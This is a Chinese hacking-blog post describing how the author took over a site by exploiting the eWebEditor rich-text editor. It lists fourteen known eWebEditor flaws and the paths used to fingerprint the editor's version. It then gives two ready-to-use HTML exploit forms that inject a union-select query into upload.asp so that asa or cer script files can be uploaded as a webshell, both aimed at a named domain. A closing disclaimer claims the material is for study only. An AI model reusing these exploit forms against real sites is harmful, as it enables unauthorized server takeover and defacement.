利用【ewebeditor漏洞】巧妙拿webshell
朋友发了个后台让帮忙拿shell,
网站采用的是ewebeditor编辑器
于是开始考虑一下漏洞是否存在:
1.ewebeditor 2.16版突破上传目录无脚本执行权限exp
2.ewebeditor 1.00版-2.16版upload.asp注入漏洞控制上传文件exp,突破无脚本执行权限
3.ewebeditor可以上传asp、asa文件,但无上传按钮工具栏
4.ewebeditor 2.7.5 上传漏洞
5.ewebeditor 2.1.6 asp版用union select控制上传拿webshell
6.ewebeditor asp版 1.0.0 上传漏洞利用程序
7.ewebeditor绕过后台登陆漏洞(通***低版本)
8.Spaw Editor v1.0至2.0远程文件上传漏洞
9.ewebeditor远程上传执行代码漏洞
10.eWebEditorNet 漏洞(aspx版漏洞)
11.ewebeditor asp版5.5-6.X解析漏洞0day
12.ewebeditor某些版本upload.asp文件注入漏洞
13.ewebeditor v2.7版以前所有版本注入漏洞
14.ewebeditor 4.6精简版上传漏洞
如何查看ewebeditor的版本:
直接点开下面链接
ewebeditor编辑器查看版本信息
edit/dialog/about.html
ewebeditor/dialog/about.html
eweb/dialog/about.html
ewebedit/dialog/about.html
ewindoweditor/dialog/about.html
发现版本是eWebEditor 2.1.6 asp版 于是利用漏洞:
1.<H1>eWebEditor 2.1.6 asp版 上传漏洞利用程序----</H1><br><br>
2.<form action="http://www.chouwazi.com/admin/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_I*geExt]%2b'|asa',S_MediaExt,S_FileSize,S_FlashSize,S_I*geSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
3.<input type=file name=uploadfile size=100><br><br>
4.<input type=submit value=Fuck>
5.</form>
2.1.6 的直接用此 exp,这个是冰的原点写的
1.<HTML><HEAD><TITLE>ewebeditor的upload文件上传exp</TITLE><meta http-equiv="Content-Type" content="text/html; charset=gb2312"> </head><body bgcolor=orange>
2.<tr>不是通***,版本有区别!我就郁闷,落叶那JJ说文章没说清楚,这份EXP就是根据文章写出来的!落叶那家伙的EXP我看半天没看明白有啥区别!<br></tr>
3.<tr>文件传到了uploadfile目录下了</tr><br>
4.<tr>不知道算不算0day,我是冰的原点</tr><br>
5.<tr>至于利用方法就是修改源文件中的action,然后传cer的马马就行了!</tr><br>
6.<form action="http://chouwazi.com/ewebeditor/upload.asp?action=save&type=IMAGE&style=firefox'%20union%20select%20S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,%20[S_I*geExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_I*geSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl%20from%20ewebeditor_style%20where%20s_name='standard'%20and%20'a'='a" method=post name=myform enctype="multipart/form-data"><input type=file name=uploadfile size=100 style="width:100%"><input type=submit value=传吧></form>
不是通***,版本有区别!如果下到数据库可以根据数据库进行修改!
最后成功拿shell...
利用【ewebeditor漏洞】巧妙拿webshell
作者:admin
免责声明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络收集整理,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序和内容,请支持正版,购买注册,得到更好的正版服务。我们非常重视版权问题,如有侵权请邮件与我们联系处理。敬请谅解!
最新评论
栏目分类
为您推荐